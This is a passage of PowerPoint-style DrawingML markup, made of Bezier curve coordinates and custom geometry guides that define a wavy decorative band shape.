                  <a:cubicBezTo>
                    <a:pt x="8630055" y="886396"/>
                    <a:pt x="8600505" y="891179"/>
                    <a:pt x="8571352" y="893639"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8532843" y="896868"/>
                    <a:pt x="8497743" y="898476"/>
                    <a:pt x="8464106" y="918004"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8412327" y="948238"/>
                    <a:pt x="8341122" y="949523"/>
                    <a:pt x="8278324" y="963769"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8262086" y="967408"/>
                    <a:pt x="8245335" y="969987"/>
                    <a:pt x="8229128" y="973810"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8199180" y="980915"/>
                    <a:pt x="8169646" y="988338"/>
                    <a:pt x="8139751" y="995815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8134478" y="997132"/>
                    <a:pt x="8128438" y="998185"/>
                    <a:pt x="8123571" y="999822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8078628" y="1014164"/>
                    <a:pt x="8034565" y="1029514"/>
                    <a:pt x="7988699" y="1042479"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7966302" y="1048884"/>
                    <a:pt x="7941011" y="1052871"/>
                    <a:pt x="7917214" y="1054565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7847636" y="1059584"/>
                    <a:pt x="7779165" y="1067276"/>
                    <a:pt x="7710915" y="1084190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7683826" y="1090885"/>
                    <a:pt x="7652466" y="1090640"/>
                    <a:pt x="7622959" y="1093150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7552361" y="1098691"/>
                    <a:pt x="7481710" y="1103861"/>
                    <a:pt x="7410782" y="1109640"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7366505" y="1113312"/>
                    <a:pt x="7322030" y="1118147"/>
                    <a:pt x="7277754" y="1121822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7226619" y="1125906"/>
                    <a:pt x="7175601" y="1128277"/>
                    <a:pt x="7124540" y="1132918"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7066293" y="1138207"/>
                    <a:pt x="7008028" y="1145955"/>
                    <a:pt x="6949752" y="1151058"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6843217" y="1160027"/>
                    <a:pt x="6736882" y="1167834"/>
                    <a:pt x="6630249" y="1176063"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6526849" y="1184018"/>
                    <a:pt x="6423556" y="1192713"/>
                    <a:pt x="6320634" y="1198901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6277297" y="1201496"/>
                    <a:pt x="6235232" y="1197679"/>
                    <a:pt x="6192343" y="1198323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6117131" y="1199612"/>
                    <a:pt x="6041418" y="1202485"/>
                    <a:pt x="5966562" y="1203723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5933144" y="1204338"/>
                    <a:pt x="5900754" y="1201974"/>
                    <a:pt x="5867227" y="1201847"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5788180" y="1201796"/>
                    <a:pt x="5708354" y="1203933"/>
                    <a:pt x="5630172" y="1202248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5535908" y="1200213"/>
                    <a:pt x="5442984" y="1194779"/>
                    <a:pt x="5348949" y="1191768"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5313810" y="1190551"/>
                    <a:pt x="5277251" y="1192179"/>
                    <a:pt x="5241228" y="1192408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5151316" y="1192775"/>
                    <a:pt x="5061657" y="1192349"/>
                    <a:pt x="4971133" y="1193559"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4937685" y="1193988"/>
                    <a:pt x="4903114" y="1199299"/>
                    <a:pt x="4869416" y="1200519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4830283" y="1201947"/>
                    <a:pt x="4791348" y="1202215"/>
                    <a:pt x="4753274" y="1200850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4705682" y="1199144"/>
                    <a:pt x="4659172" y="1194829"/>
                    <a:pt x="4611883" y="1192701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4533819" y="1189298"/>
                    <a:pt x="4455420" y="1186135"/>
                    <a:pt x="4376825" y="1184131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4347226" y="1183446"/>
                    <a:pt x="4315374" y="1187423"/>
                    <a:pt x="4285471" y="1187158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4145774" y="1185753"/>
                    <a:pt x="4006046" y="1184162"/>
                    <a:pt x="3866543" y="1181596"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3794230" y="1180207"/>
                    <a:pt x="3723633" y="1175551"/>
                    <a:pt x="3651342" y="1174348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3607885" y="1173562"/>
                    <a:pt x="3561907" y="1178044"/>
                    <a:pt x="3518453" y="1177258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3478287" y="1176568"/>
                    <a:pt x="3440399" y="1171400"/>
                    <a:pt x="3400818" y="1169685"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3279824" y="1164099"/>
                    <a:pt x="3157310" y="1160621"/>
                    <a:pt x="3037154" y="1153217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2978373" y="1149708"/>
                    <a:pt x="2922429" y="1140508"/>
                    <a:pt x="2866260" y="1132283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2771049" y="1118489"/>
                    <a:pt x="2677107" y="1103380"/>
                    <a:pt x="2582173" y="1088979"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2511090" y="1078352"/>
                    <a:pt x="2447356" y="1063086"/>
                    <a:pt x="2395406" y="1035945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2371411" y="1023508"/>
                    <a:pt x="2331675" y="1015582"/>
                    <a:pt x="2294751" y="1014618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2228580" y="1012920"/>
                    <a:pt x="2177384" y="998698"/>
                    <a:pt x="2122944" y="984751"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2054121" y="967003"/>
                    <a:pt x="1981585" y="951294"/>
                    <a:pt x="1905504" y="941380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1830544" y="931682"/>
                    <a:pt x="1747929" y="932141"/>
                    <a:pt x="1671045" y="924228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1625936" y="919523"/>
                    <a:pt x="1585613" y="907528"/>
                    <a:pt x="1543856" y="898190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1502093" y="888855"/>
                    <a:pt x="1460606" y="878913"/>
                    <a:pt x="1419784" y="868500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1397486" y="862806"/>
                    <a:pt x="1378078" y="854435"/>
                    <a:pt x="1355116" y="849214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1311848" y="839527"/>
                    <a:pt x="1265353" y="832754"/>
                    <a:pt x="1223713" y="821702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1183577" y="811001"/>
                    <a:pt x="1138864" y="809072"/>
                    <a:pt x="1094193" y="804872"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1060244" y="801784"/>
                    <a:pt x="1034230" y="787936"/>
                    <a:pt x="1001115" y="783030"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="953853" y="775990"/>
                    <a:pt x="916853" y="764276"/>
                    <a:pt x="879548" y="747884"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="837586" y="729513"/>
                    <a:pt x="770061" y="725929"/>
                    <a:pt x="711163" y="719039"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="661152" y="713146"/>
                    <a:pt x="604343" y="715774"/>
                    <a:pt x="557941" y="707101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525381" y="700984"/>
                    <a:pt x="499355" y="684493"/>
                    <a:pt x="480347" y="668702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437718" y="632865"/>
                    <a:pt x="370204" y="616630"/>
                    <a:pt x="296224" y="603583"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220741" y="590184"/>
                    <a:pt x="148480" y="573869"/>
                    <a:pt x="72689" y="560892"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="543486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="384357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51784" y="393937"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="104770" y="397707"/>
                    <a:pt x="153378" y="409086"/>
                    <a:pt x="205561" y="414859"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254062" y="420400"/>
                    <a:pt x="305001" y="422574"/>
                    <a:pt x="354391" y="426667"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="386450" y="429269"/>
                    <a:pt x="420771" y="429847"/>
                    <a:pt x="448281" y="436308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="499904" y="448391"/>
                    <a:pt x="551004" y="446576"/>
                    <a:pt x="611518" y="434166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="654695" y="425361"/>
                    <a:pt x="702395" y="422710"/>
                    <a:pt x="746076" y="422520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="798481" y="422218"/>
                    <a:pt x="848400" y="419817"/>
                    <a:pt x="902724" y="409989"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="977291" y="396518"/>
                    <a:pt x="1048428" y="397321"/>
                    <a:pt x="1113854" y="414230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1184155" y="432145"/>
                    <a:pt x="1258677" y="446437"/>
                    <a:pt x="1333449" y="459938"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1354772" y="463883"/>
                    <a:pt x="1385284" y="463304"/>
                    <a:pt x="1408608" y="458278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1483492" y="441930"/>
                    <a:pt x="1561495" y="427025"/>
                    <a:pt x="1630191" y="403061"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1735315" y="366348"/>
                    <a:pt x="1840887" y="337881"/>
                    <a:pt x="1956289" y="332366"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1986669" y="330865"/>
                    <a:pt x="2019100" y="336056"/>
                    <a:pt x="2042814" y="344002"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2085261" y="358150"/>
                    <a:pt x="2126350" y="370413"/>
                    <a:pt x="2183420" y="369635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2235035" y="368879"/>
                    <a:pt x="2279659" y="405942"/>
                    <a:pt x="2269566" y="439859"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2258267" y="478101"/>
                    <a:pt x="2277762" y="504964"/>
                    <a:pt x="2331129" y="524163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2352980" y="531807"/>
                    <a:pt x="2364861" y="546162"/>
                    <a:pt x="2385112" y="555357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2401860" y="562976"/>
                    <a:pt x="2421927" y="570875"/>
                    <a:pt x="2444033" y="572629"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2483469" y="575878"/>
                    <a:pt x="2509763" y="584022"/>
                    <a:pt x="2525979" y="603233"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2549282" y="631254"/>
                    <a:pt x="2578520" y="657481"/>
                    <a:pt x="2603911" y="684825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2618910" y="700624"/>
                    <a:pt x="2643515" y="707120"/>
                    <a:pt x="2678828" y="706990"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2699243" y="707100"/>
                    <a:pt x="2725615" y="705603"/>
                    <a:pt x="2738094" y="711376"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2805960" y="742855"/>
                    <a:pt x="2895980" y="733032"/>
                    <a:pt x="2983806" y="728243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2993929" y="727744"/>
                    <a:pt x="3004007" y="726871"/>
                    <a:pt x="3013997" y="725446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3136002" y="707474"/>
                    <a:pt x="3250133" y="713470"/>
                    <a:pt x="3364419" y="720577"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3394563" y="722507"/>
                    <a:pt x="3428050" y="719807"/>
                    <a:pt x="3460521" y="717628"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3545330" y="712137"/>
                    <a:pt x="3633314" y="698262"/>
                    <a:pt x="3710982" y="714182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3772122" y="726607"/>
                    <a:pt x="3825029" y="745116"/>
                    <a:pt x="3850961" y="778802"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3868395" y="801427"/>
                    <a:pt x="3898481" y="813185"/>
                    <a:pt x="3946286" y="816372"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3987480" y="819179"/>
                    <a:pt x="4025130" y="827781"/>
                    <a:pt x="4065132" y="832459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4086246" y="834922"/>
                    <a:pt x="4110400" y="838274"/>
                    <a:pt x="4132173" y="835167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4190358" y="826865"/>
                    <a:pt x="4249453" y="817300"/>
                    <a:pt x="4305858" y="804156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4334041" y="797490"/>
                    <a:pt x="4360739" y="782919"/>
                    <a:pt x="4382131" y="769481"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4404161" y="755388"/>
                    <a:pt x="4425552" y="747047"/>
                    <a:pt x="4453289" y="752531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4522267" y="766292"/>
                    <a:pt x="4590589" y="780524"/>
                    <a:pt x="4657971" y="795835"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4669645" y="798513"/>
                    <a:pt x="4675987" y="807238"/>
                    <a:pt x="4682399" y="813876"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4712325" y="844914"/>
                    <a:pt x="4739115" y="876968"/>
                    <a:pt x="4771814" y="907046"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4783117" y="917329"/>
                    <a:pt x="4807945" y="922850"/>
                    <a:pt x="4827520" y="929876"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4833681" y="932206"/>
                    <a:pt x="4845543" y="931081"/>
                    <a:pt x="4849942" y="933851"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4888949" y="959631"/>
                    <a:pt x="4951287" y="954890"/>
                    <a:pt x="5009626" y="957896"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5059523" y="960407"/>
                    <a:pt x="5111928" y="960104"/>
                    <a:pt x="5158711" y="963814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5231307" y="969696"/>
                    <a:pt x="5298173" y="973751"/>
                    <a:pt x="5376427" y="963151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5408579" y="958754"/>
                    <a:pt x="5448461" y="970245"/>
                    <a:pt x="5475787" y="980508"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5528518" y="1000363"/>
                    <a:pt x="5584839" y="1001958"/>
                    <a:pt x="5653401" y="987268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5676008" y="982341"/>
                    <a:pt x="5702558" y="984595"/>
                    <a:pt x="5726340" y="985357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5748643" y="985952"/>
                    <a:pt x="5770110" y="988364"/>
                    <a:pt x="5790563" y="991300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5815128" y="994969"/>
                    <a:pt x="5845522" y="996110"/>
                    <a:pt x="5860260" y="1004958"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5906803" y="1032493"/>
                    <a:pt x="5977069" y="1037385"/>
                    <a:pt x="6042101" y="1036226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6128232" y="1034888"/>
                    <a:pt x="6222269" y="1027704"/>
                    <a:pt x="6301998" y="989138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6349672" y="965909"/>
                    <a:pt x="6396952" y="955198"/>
                    <a:pt x="6452025" y="968489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6489401" y="977695"/>
                    <a:pt x="6558002" y="960731"/>
                    <a:pt x="6589205" y="939474"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6600499" y="931821"/>
                    <a:pt x="6612148" y="924116"/>
                    <a:pt x="6631069" y="911222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6674305" y="951313"/>
                    <a:pt x="6752346" y="944332"/>
                    <a:pt x="6828274" y="942941"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6874780" y="942157"/>
                    <a:pt x="6889173" y="963896"/>
                    <a:pt x="6900803" y="984140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6921316" y="1020676"/>
                    <a:pt x="6959796" y="1032557"/>
                    <a:pt x="7034668" y="1018665"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7117337" y="1003282"/>
                    <a:pt x="7199637" y="985309"/>
                    <a:pt x="7281067" y="966327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7332521" y="954266"/>
                    <a:pt x="7378029" y="936255"/>
                    <a:pt x="7412780" y="909206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7446535" y="882864"/>
                    <a:pt x="7455445" y="884046"/>
                    <a:pt x="7500327" y="894826"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7552743" y="907363"/>
                    <a:pt x="7606735" y="918164"/>
                    <a:pt x="7662324" y="927415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7679867" y="930387"/>
                    <a:pt x="7704114" y="926740"/>
                    <a:pt x="7725334" y="924844"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7761320" y="921787"/>
                    <a:pt x="7798617" y="920242"/>
                    <a:pt x="7833279" y="913031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7866516" y="906023"/>
                    <a:pt x="7898634" y="893700"/>
                    <a:pt x="7928605" y="881683"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8012311" y="848025"/>
                    <a:pt x="8088138" y="810205"/>
                    <a:pt x="8146597" y="762968"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8154091" y="756800"/>
                    <a:pt x="8170249" y="752606"/>
                    <a:pt x="8183577" y="749005"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8205312" y="743071"/>
                    <a:pt x="8227788" y="737222"/>
                    <a:pt x="8250224" y="733642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8359189" y="716209"/>
                    <a:pt x="8441164" y="678078"/>
                    <a:pt x="8505929" y="626542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8524585" y="611796"/>
                    <a:pt x="8540107" y="608259"/>
                    <a:pt x="8564194" y="618796"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8592162" y="631043"/>
                    <a:pt x="8628032" y="619507"/>
                    <a:pt x="8660705" y="611069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8694442" y="602479"/>
                    <a:pt x="8728514" y="593651"/>
                    <a:pt x="8762255" y="585060"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8787227" y="578855"/>
                    <a:pt x="8811899" y="573069"/>
                    <a:pt x="8836439" y="566358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8912856" y="545447"/>
                    <a:pt x="8983243" y="538425"/>
                    <a:pt x="9050728" y="559575"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9102219" y="575830"/>
                    <a:pt x="9164950" y="573868"/>
                    <a:pt x="9229627" y="557464"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9237706" y="555368"/>
                    <a:pt x="9247529" y="550190"/>
                    <a:pt x="9253451" y="550855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9342568" y="560232"/>
                    <a:pt x="9405310" y="512383"/>
                    <a:pt x="9484214" y="498671"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9519035" y="492570"/>
                    <a:pt x="9552778" y="473783"/>
                    <a:pt x="9582633" y="458384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9623689" y="437231"/>
                    <a:pt x="9660183" y="417297"/>
                    <a:pt x="9719670" y="415607"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9779189" y="414101"/>
                    <a:pt x="9830940" y="393878"/>
                    <a:pt x="9871784" y="366147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9903014" y="345075"/>
                    <a:pt x="9939570" y="338349"/>
                    <a:pt x="9984494" y="336660"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10040642" y="334503"/>
                    <a:pt x="10098165" y="326674"/>
                    <a:pt x="10154708" y="322193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10166953" y="321201"/>
                    <a:pt x="10182669" y="321603"/>
                    <a:pt x="10190446" y="325025"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10285769" y="367692"/>
                    <a:pt x="10408999" y="350677"/>
                    <a:pt x="10530736" y="335953"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10604506" y="327127"/>
                    <a:pt x="10678397" y="316584"/>
                    <a:pt x="10752157" y="305117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10777120" y="301365"/>
                    <a:pt x="10803110" y="294636"/>
                    <a:pt x="10824452" y="285927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10868837" y="267698"/>
                    <a:pt x="10909147" y="246465"/>
                    <a:pt x="10953152" y="228102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10969622" y="221030"/>
                    <a:pt x="10991730" y="217688"/>
                    <a:pt x="11011614" y="214096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11046743" y="207573"/>
                    <a:pt x="11086641" y="206412"/>
                    <a:pt x="11116031" y="195421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11192467" y="166956"/>
                    <a:pt x="11266913" y="160299"/>
                    <a:pt x="11344303" y="166629"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11452657" y="175527"/>
                    <a:pt x="11551626" y="159519"/>
                    <a:pt x="11639050" y="108526"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11678385" y="85543"/>
                    <a:pt x="11720243" y="87879"/>
                    <a:pt x="11757532" y="96530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11800499" y="106640"/>
                    <a:pt x="11840704" y="105056"/>
                    <a:pt x="11885799" y="86728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11895784" y="82659"/>
                    <a:pt x="11910604" y="81867"/>
                    <a:pt x="11922874" y="81060"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11992783" y="75806"/>
                    <a:pt x="12063500" y="73647"/>
                    <a:pt x="12115331" y="33587"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12125500" y="25715"/>
                    <a:pt x="12143693" y="20477"/>
                    <a:pt x="12158080" y="140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381000" dist="152400" dir="16200000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2E89A7A5-0E38-41FA-99A1-057DFCDD6E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014035"/>
              <a:ext cx="12192000" cy="1203824"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 12192000 w 12192000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1203824"/>
                <a:gd name="connsiteX1" fmla="*/ 12192000 w 12192000"/>
                <a:gd name="connsiteY1" fmla="*/ 463429 h 1203824"/>
                <a:gd name="connsiteX2" fmla="*/ 12190876 w 12192000"/>
                <a:gd name="connsiteY2" fmla="*/ 463512 h 1203824"/>
                <a:gd name="connsiteX3" fmla="*/ 12077245 w 12192000"/>
                <a:gd name="connsiteY3" fmla="*/ 476327 h 1203824"/>
                <a:gd name="connsiteX4" fmla="*/ 11984517 w 12192000"/>
                <a:gd name="connsiteY4" fmla="*/ 479927 h 1203824"/>
                <a:gd name="connsiteX5" fmla="*/ 11951600 w 12192000"/>
                <a:gd name="connsiteY5" fmla="*/ 478957 h 1203824"/>
                <a:gd name="connsiteX6" fmla="*/ 11690904 w 12192000"/>
                <a:gd name="connsiteY6" fmla="*/ 471970 h 1203824"/>
                <a:gd name="connsiteX7" fmla="*/ 11413965 w 12192000"/>
                <a:gd name="connsiteY7" fmla="*/ 476172 h 1203824"/>
                <a:gd name="connsiteX8" fmla="*/ 11240739 w 12192000"/>
                <a:gd name="connsiteY8" fmla="*/ 523169 h 1203824"/>
                <a:gd name="connsiteX9" fmla="*/ 11175005 w 12192000"/>
                <a:gd name="connsiteY9" fmla="*/ 532169 h 1203824"/>
                <a:gd name="connsiteX10" fmla="*/ 10873726 w 12192000"/>
                <a:gd name="connsiteY10" fmla="*/ 580253 h 1203824"/>
                <a:gd name="connsiteX11" fmla="*/ 10821306 w 12192000"/>
                <a:gd name="connsiteY11" fmla="*/ 593207 h 1203824"/>
                <a:gd name="connsiteX12" fmla="*/ 10530811 w 12192000"/>
                <a:gd name="connsiteY12" fmla="*/ 612184 h 1203824"/>
                <a:gd name="connsiteX13" fmla="*/ 10426049 w 12192000"/>
                <a:gd name="connsiteY13" fmla="*/ 623354 h 1203824"/>
                <a:gd name="connsiteX14" fmla="*/ 10329156 w 12192000"/>
                <a:gd name="connsiteY14" fmla="*/ 630948 h 1203824"/>
                <a:gd name="connsiteX15" fmla="*/ 10194727 w 12192000"/>
                <a:gd name="connsiteY15" fmla="*/ 648617 h 1203824"/>
                <a:gd name="connsiteX16" fmla="*/ 10055906 w 12192000"/>
                <a:gd name="connsiteY16" fmla="*/ 671256 h 1203824"/>
                <a:gd name="connsiteX17" fmla="*/ 9900551 w 12192000"/>
                <a:gd name="connsiteY17" fmla="*/ 692855 h 1203824"/>
                <a:gd name="connsiteX18" fmla="*/ 9838464 w 12192000"/>
                <a:gd name="connsiteY18" fmla="*/ 696804 h 1203824"/>
                <a:gd name="connsiteX19" fmla="*/ 9672957 w 12192000"/>
                <a:gd name="connsiteY19" fmla="*/ 723816 h 1203824"/>
                <a:gd name="connsiteX20" fmla="*/ 9585066 w 12192000"/>
                <a:gd name="connsiteY20" fmla="*/ 730692 h 1203824"/>
                <a:gd name="connsiteX21" fmla="*/ 9441407 w 12192000"/>
                <a:gd name="connsiteY21" fmla="*/ 750055 h 1203824"/>
                <a:gd name="connsiteX22" fmla="*/ 9394459 w 12192000"/>
